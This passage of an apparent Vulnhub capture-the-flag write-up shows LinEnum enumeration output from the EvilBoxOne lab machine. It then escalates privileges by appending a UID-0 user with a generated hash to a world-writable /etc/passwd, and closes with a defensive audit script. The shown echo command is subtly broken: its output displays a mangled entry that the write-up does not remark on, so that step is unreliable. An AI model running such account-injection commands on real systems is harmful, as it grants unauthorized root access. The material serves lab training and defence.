Wed 2022-10-26 08:14:24 CEST 23h left Tue 2022-10-25 08:14:24 CEST 32min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
6 timers listed.
Enable thorough tests to see inactive timers
### NETWORKING ##########################################
[-] Network and IP info:
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:3a:ed:42 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.103/24 brd 192.168.56.255 scope global dynamic enp0s3
valid_lft 360sec preferred_lft 360sec
inet6 fe80::a00:27ff:fe3a:ed42/64 scope link
valid_lft forever preferred_lft forever
[-] ARP history:
192.168.56.100 dev enp0s3 lladdr 08:00:27:2e:93:a7 STALE
192.168.56.101 dev enp0s3 lladdr 08:00:27:42:44:82 REACHABLE
[-] Nameserver(s):
nameserver 192.168.1.1
[-] Listening TCP:
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 128 *:80 *:*
LISTEN 0 128 [::]:22 [::]:*
[-] Listening UDP:
State Recv-Q Send-Q Local Address:Port Peer Address:Port
UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
### SERVICES #############################################
[-] Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.9 103792 10004 ? Ss 07:59 0:00 /sbin/init
root 2 0.0 0.0 0 0 ? S 07:59 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? I< 07:59 0:00 [rcu_gp]
root 4 0.0 0.0 0 0 ? I< 07:59 0:00 [rcu_par_gp]
root 6 0.0 0.0 0 0 ? I< 07:59 0:00 [kworker/0:0H-kblockd]
root 7 0.0 0.0 0 0 ? I 07:59 0:00 [kworker/u2:0-events_unbound]
root 8 0.0 0.0 0 0 ? I< 07:59 0:00 [mm_percpu_wq]
root 9 0.0 0.0 0 0 ? S 07:59 0:01 [ksoftirqd/0]
root 10 0.0 0.0 0 0 ? I 07:59 0:00 [rcu_sched]
root 11 0.0 0.0 0 0 ? I 07:59 0:00 [rcu_bh]
root 12 0.0 0.0 0 0 ? S 07:59 0:00 [migration/0]
root 13 0.0 0.0 0 0 ? I 07:59 0:01 [kworker/0:1-events]
root 14 0.0 0.0 0 0 ? S 07:59 0:00 [cpuhp/0]
root 15 0.0 0.0 0 0 ? S 07:59 0:00 [kdevtmpfs]
root 16 0.0 0.0 0 0 ? I< 07:59 0:00 [netns]
root 17 0.0 0.0 0 0 ? S 07:59 0:00 [kauditd]
root 18 0.0 0.0 0 0 ? S 07:59 0:00 [khungtaskd]
root 19 0.0 0.0 0 0 ? S 07:59 0:00 [oom_reaper]
root 20 0.0 0.0 0 0 ? I< 07:59 0:00 [writeback]
root 21 0.0 0.0 0 0 ? S 07:59 0:00 [kcompactd0]
root 22 0.0 0.0 0 0 ? SN 07:59 0:00 [ksmd]
root 23 0.0 0.0 0 0 ? SN 07:59 0:00 [khugepaged]
root 24 0.0 0.0 0 0 ? I< 07:59 0:00 [crypto]
root 25 0.0 0.0 0 0 ? I< 07:59 0:00 [kintegrityd]
root 26 0.0 0.0 0 0 ? I< 07:59 0:00 [kblockd]
root 27 0.0 0.0 0 0 ? I< 07:59 0:00 [edac-poller]
root 28 0.0 0.0 0 0 ? I< 07:59 0:00 [devfreq_wq]
root 29 0.0 0.0 0 0 ? S 07:59 0:00 [watchdogd]
root 30 0.0 0.0 0 0 ? S 07:59 0:00 [kswapd0]
root 48 0.0 0.0 0 0 ? I< 07:59 0:00 [kthrotld]
root 49 0.0 0.0 0 0 ? I< 07:59 0:00 [ipv6_addrconf]
root 59 0.0 0.0 0 0 ? I< 07:59 0:00 [kstrp]
root 102 0.0 0.0 0 0 ? I< 07:59 0:00 [ata_sff]
root 106 0.0 0.0 0 0 ? S 07:59 0:00 [scsi_eh_0]
root 108 0.0 0.0 0 0 ? I< 07:59 0:00 [scsi_tmf_0]
root 109 0.0 0.0 0 0 ? S 07:59 0:00 [scsi_eh_1]
root 110 0.0 0.0 0 0 ? S 07:59 0:00 [scsi_eh_2]
root 112 0.0 0.0 0 0 ? I< 07:59 0:00 [scsi_tmf_1]
root 113 0.0 0.0 0 0 ? I< 07:59 0:00 [scsi_tmf_2]
root 114 0.0 0.0 0 0 ? I 07:59 0:00 [kworker/u2:2-events_unbound]
root 154 0.0 0.0 0 0 ? I< 07:59 0:00 [kworker/0:1H-kblockd]
root 184 0.0 0.0 0 0 ? I< 07:59 0:00 [kworker/u3:0]
root 186 0.0 0.0 0 0 ? S 07:59 0:00 [jbd2/sda1-8]
root 187 0.0 0.0 0 0 ? I< 07:59 0:00 [ext4-rsv-conver]
root 220 0.0 0.7 32168 7812 ? Ss 07:59 0:00 /lib/systemd/systemd-journald
root 236 0.0 0.4 21936 4828 ? Ss 07:59 0:00 /lib/systemd/systemd-udevd
root 283 0.0 0.0 0 0 ? I< 07:59 0:00 [ttm_swap]
root 284 0.0 0.0 0 0 ? S 07:59 0:00 [irq/18-vmwgfx]
systemd+ 319 0.0 0.6 93084 6496 ? Ssl 07:59 0:00 /lib/systemd/systemd-timesyncd
root 359 0.0 0.7 19392 7292 ? Ss 07:59 0:00 /lib/systemd/systemd-logind
root 360 0.0 0.5 9488 5584 ? Ss 07:59 0:00 /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3
message+ 362 0.0 0.4 8764 4200 ? Ss 07:59 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root 365 0.0 0.2 8504 2688 ? Ss 07:59 0:00 /usr/sbin/cron -f
root 367 0.0 0.3 225824 3832 ? Ssl 07:59 0:00 /usr/sbin/rsyslogd -n -iNONE
root 389 0.0 0.1 5612 1592 tty1 Ss+ 07:59 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root 401 0.0 0.7 15852 7148 ? Ss 07:59 0:00 /usr/sbin/sshd -D
root 448 0.0 1.9 196800 19796 ? Ss 07:59 0:00 /usr/sbin/apache2 -k start
www-data 601 0.4 1.1 197044 11744 ? S 08:07 0:11 /usr/sbin/apache2 -k start
www-data 673 0.1 1.1 197044 11744 ? S 08:14 0:02 /usr/sbin/apache2 -k start
www-data 707 0.0 1.2 197188 12800 ? S 08:18 0:00 /usr/sbin/apache2 -k start
www-data 708 0.0 1.3 197188 13424 ? S 08:18 0:00 /usr/sbin/apache2 -k start
www-data 709 0.0 1.2 197180 12992 ? S 08:18 0:00 /usr/sbin/apache2 -k start
www-data 724 0.0 1.1 197044 11896 ? S 08:20 0:00 /usr/sbin/apache2 -k start
www-data 725 0.0 1.2 197188 12812 ? S 08:20 0:00 /usr/sbin/apache2 -k start
www-data 726 0.0 1.1 197044 11896 ? S 08:20 0:00 /usr/sbin/apache2 -k start
www-data 728 0.0 1.1 197044 11900 ? S 08:20 0:00 /usr/sbin/apache2 -k start
www-data 729 0.0 1.1 197036 11900 ? S 08:20 0:00 /usr/sbin/apache2 -k start
root 812 0.0 0.0 0 0 ? I 08:40 0:00 [kworker/0:0-ata_sff]
root 813 0.0 0.7 16600 7868 ? Ss 08:42 0:00 sshd: mowree [priv]
mowree 816 0.0 0.8 21028 8260 ? Ss 08:42 0:00 /lib/systemd/systemd --user
mowree 817 0.0 0.2 104756 2204 ? S 08:42 0:00 (sd-pam)
mowree 826 0.0 0.4 16600 4608 ? S 08:42 0:00 sshd: mowree@pts/0
mowree 827 0.0 0.4 7784 4640 pts/0 Ss 08:42 0:00 -bash
root 835 0.0 0.0 0 0 ? I 08:45 0:00 [kworker/0:2-ata_sff]
mowree 842 0.5 0.3 7568 3916 pts/0 S+ 08:46 0:00 /bin/bash ./shell.sh
mowree 843 0.0 0.3 7568 3344 pts/0 S+ 08:46 0:00 /bin/bash ./shell.sh
mowree 844 0.0 0.0 5556 684 pts/0 S+ 08:46 0:00 tee -a
root 1015 0.0 0.2 21936 2200 ? S 08:46 0:00 /lib/systemd/systemd-udevd
mowree 1022 0.0 0.2 7568 2720 pts/0 S+ 08:46 0:00 /bin/bash ./shell.sh
mowree 1023 0.0 0.3 10632 3120 pts/0 R+ 08:46 0:00 ps aux
[-] Process binaries and associated permissions (from above list):
1,2M -rwxr-xr-x 1 root root 1,2M abr 18 2019 /bin/bash
1,5M -rwxr-xr-x 1 root root 1,5M jul 8 2021 /lib/systemd/systemd
144K -rwxr-xr-x 1 root root 143K jul 8 2021 /lib/systemd/systemd-journald
228K -rwxr-xr-x 1 root root 227K jul 8 2021 /lib/systemd/systemd-logind
56K -rwxr-xr-x 1 root root 55K jul 8 2021 /lib/systemd/systemd-timesyncd
664K -rwxr-xr-x 1 root root 663K jul 8 2021 /lib/systemd/systemd-udevd
64K -rwxr-xr-x 1 root root 64K ene 10 2019 /sbin/agetty
496K -rwxr-xr-x 1 root root 493K jun 3 2021 /sbin/dhclient
0 lrwxrwxrwx 1 root root 20 jul 8 2021 /sbin/init -> /lib/systemd/systemd
236K -rwxr-xr-x 1 root root 236K jul 5 2020 /usr/bin/dbus-daemon
672K -rwxr-xr-x 1 root root 672K jun 10 2021 /usr/sbin/apache2
56K -rwxr-xr-x 1 root root 55K oct 11 2019 /usr/sbin/cron
688K -rwxr-xr-x 1 root root 686K feb 26 2019 /usr/sbin/rsyslogd
792K -rwxr-xr-x 1 root root 789K ene 31 2020 /usr/sbin/sshd
[-] /etc/init.d/ binary permissions:
total 76
drwxr-xr-x 2 root root 4096 ago 16 2021 .
drwxr-xr-x 71 root root 4096 ago 16 2021 ..
-rwxr-xr-x 1 root root 8181 ago 8 2020 apache2
-rwxr-xr-x 1 root root 2489 ago 8 2020 apache-htcacheclean
-rwxr-xr-x 1 root root 3740 mar 30 2019 apparmor
-rwxr-xr-x 1 root root 1232 ago 15 2019 console-setup.sh
-rwxr-xr-x 1 root root 3059 oct 11 2019 cron
-rwxr-xr-x 1 root root 2813 jul 5 2020 dbus
-rwxr-xr-x 1 root root 3809 ene 10 2019 hwclock.sh
-rwxr-xr-x 1 root root 1479 oct 10 2016 keyboard-setup.sh
-rwxr-xr-x 1 root root 2044 feb 9 2019 kmod
-rwxr-xr-x 1 root root 4445 ago 25 2018 networking
-rwxr-xr-x 1 root root 924 may 31 2018 procps
-rwxr-xr-x 1 root root 2864 feb 26 2019 rsyslog
-rwxr-xr-x 1 root root 3939 ene 31 2020 ssh
-rwxr-xr-x 1 root root 6872 ene 29 2021 udev
[-] /lib/systemd/* config file permissions:
### SOFTWARE #############################################
[-] Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
### INTERESTING FILES ####################################
[-] Useful file locations:
/usr/bin/nc
/usr/bin/netcat
/usr/bin/wget
[-] Can we read/write sensitive files:
-rw-rw-rw- 1 root root 1398 ago 16 2021 /etc/passwd
-rw-r--r-- 1 root root 732 ago 16 2021 /etc/group
-rw-r--r-- 1 root root 767 mar 4 2016 /etc/profile
-rw-r----- 1 root shadow 941 ago 16 2021 /etc/shadow
[-] SUID files:
-rwsr-xr-x 1 root root 436552 ene 31 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10232 mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 51184 jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 51280 ene 10 2019 /usr/bin/mount
-rwsr-xr-x 1 root root 44440 jul 27 2018 /usr/bin/newgrp
-rwsr-xr-x 1 root root 63736 jul 27 2018 /usr/bin/passwd
-rwsr-xr-x 1 root root 34888 ene 10 2019 /usr/bin/umount
-rwsr-xr-x 1 root root 54096 jul 27 2018 /usr/bin/chfn
-rwsr-xr-x 1 root root 44528 jul 27 2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 84016 jul 27 2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 63568 ene 10 2019 /usr/bin/su
[-] SGID files:
-rwxr-sr-x 1 root shadow 39616 feb 14 2019 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root tty 14736 may 4 2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root mail 18944 dic 3 2017 /usr/bin/dotlockfile
-rwxr-sr-x 1 root shadow 71816 jul 27 2018 /usr/bin/chage
-rwxr-sr-x 1 root shadow 31000 jul 27 2018 /usr/bin/expiry
-rwxr-sr-x 1 root tty 34896 ene 10 2019 /usr/bin/wall
-rwxr-sr-x 1 root crontab 43568 oct 11 2019 /usr/bin/crontab
-rwxr-sr-x 1 root ssh 321672 ene 31 2020 /usr/bin/ssh-agent
[+] Files with POSIX capabilities set:
/usr/bin/ping = cap_net_raw+ep
[-] Can't search *.conf files as no keyword was entered
[-] Can't search *.php files as no keyword was entered
[-] Can't search *.log files as no keyword was entered
[-] Can't search *.ini files as no keyword was entered
[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 435 ago 22 2018 /etc/logrotate.conf
-rw-r--r-- 1 root root 494 feb 10 2019 /etc/nsswitch.conf
-rw-r--r-- 1 root root 2981 ago 16 2021 /etc/adduser.conf
-rw-r--r-- 1 root root 5060 oct 26 2018 /etc/hdparm.conf
-rw-r--r-- 1 root root 812 ene 10 2020 /etc/mke2fs.conf
-rw-r--r-- 1 root root 642 mar 1 2019 /etc/xattr.conf
-rw-r--r-- 1 root root 191 abr 25 2019 /etc/libaudit.conf
-rw-r--r-- 1 root root 144 ago 16 2021 /etc/kernel-img.conf
-rw-r--r-- 1 root root 2351 may 31 2018 /etc/sysctl.conf
-rw-r--r-- 1 root root 2584 ago 1 2018 /etc/gai.conf
-rw-r--r-- 1 root root 3267 ago 29 2019 /etc/reportbug.conf
-rw-r--r-- 1 root root 47 ago 16 2021 /etc/resolv.conf
-rw-r--r-- 1 root root 2969 feb 26 2019 /etc/debconf.conf
-rw-r--r-- 1 root root 9 ago 7 2006 /etc/host.conf
-rw-r--r-- 1 root root 1988 feb 26 2019 /etc/rsyslog.conf
-rw-r--r-- 1 root root 5989 ago 16 2021 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 34 mar 2 2018 /etc/ld.so.conf
-rw-r--r-- 1 root root 604 jun 26 2016 /etc/deluser.conf
-rw-r--r-- 1 root root 346 ene 14 2018 /etc/discover-modprobe.conf
-rw-r--r-- 1 root root 552 feb 14 2019 /etc/pam.conf
-rw-r--r-- 1 root root 1260 dic 14 2018 /etc/ucf.conf
[-] Current user's history files:
lrwxrwxrwx 1 root root 9 ago 16 2021 /home/mowree/.bash_history -> /dev/null
[-] Location and contents (if accessible) of .bash_history file(s):
/home/mowree/.bash_history
[-] Any interesting mail in /var/mail:
total 8
drwxrwsr-x 2 root mail 4096 ago 16 2021 .
drwxr-xr-x 12 root root 4096 ago 16 2021 ..
### SCAN COMPLETE ####################################
mowree@EvilBoxOne:/tmp$
A closer look at the linenum.sh output shows:
[-] Can we read/write sensitive files:
-rw-rw-rw- 1 root root 1398 ago 16 2021 /etc/passwd
Every user has read and write access to this file, so create a user, give it a password and root privileges, and append it to /etc/passwd.
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ mkpasswd -m sha-512
Password:
$6$LPAS6IP4CD0PA46A$uWJHMTvO4hEzT3rR8MgtV664Kz/1qrsWE8Bw/jE0CRdwhzKbob3kCoZKs5E1ckI4XWYHIWHVFsT2b6.XR4Mbw/
mowree@EvilBoxOne:/tmp$ echo "kali:$6$LPAS6IP4CD0PA46A$uWJHMTvO4hEzT3rR8MgtV664Kz/1qrsWE8Bw/jE0CRdwhzKbob3kCoZKs5E1ckI4XWYHIWHVFsT2b6.XR4Mbw/:0:0:root,,,:/root:/bin/bash" >> /etc/passwd
mowree@EvilBoxOne:/tmp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
kali:/1qrsWE8Bw/jE0CRdwhzKbob3kCoZKs5E1ckI4XWYHIWHVFsT2b6.XR4Mbw/:0:0:root,,,:/root:/bin/bash
mowree@EvilBoxOne:/tmp$
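From the defender's side, the world-writable /etc/passwd and the appended entry above can both be caught with a small audit. The following is an added example, not part of the original write-up; the function names `audit_passwd` and `make_sample` and the `demo` account are constructed for illustration.

```shell
#!/bin/sh
# Added example: audit a passwd-format file for the weakness LinEnum reported.
# Function names and the sample data are constructed for illustration.

# make_sample FILE: write a constructed passwd file with one rogue entry.
make_sample() {
    cat > "$1" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
demo:$6$CONSTRUCTEDSALT$CONSTRUCTEDHASH:0:0:root,,,:/root:/bin/bash
EOF
}

# audit_passwd FILE: print one finding per line; print nothing if clean.
audit_passwd() {
    [ -r "$1" ] || { echo "cannot read $1" >&2; return 2; }
    # Finding 1: the file itself is writable by group or other (expected 0644).
    if [ -n "$(find "$1" -prune \( -perm -020 -o -perm -002 \) -print)" ]; then
        echo "MODE $1 is writable by group or other"
    fi
    # Remaining findings: per-entry checks on the seven colon-separated fields.
    awk -F: '
        NF != 7 { print "MALFORMED line " NR " has " NF " fields"; next }
        $3 == 0 && $1 != "root" { print "UID0 " $1 " has UID 0 but is not root" }
        $2 != "x" && $2 != "*" && $2 !~ /^!/ {
            print "PWFIELD " $1 " keeps its password field in this file, not in /etc/shadow"
        }
    ' "$1"
}

# Demo on the constructed sample, made world-writable like the target's file.
sample=$(mktemp)
make_sample "$sample"
chmod 666 "$sample"
audit_passwd "$sample"
rm -f "$sample"
```

On a real host, run `audit_passwd /etc/passwd`. The PWFIELD check fires on any second field other than `x`, `*` or a `!`-prefixed value, so it also catches an entry whose hash was mangled on the way in.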
From: https://www.cnblogs.com/jason-huawen/p/16824998.html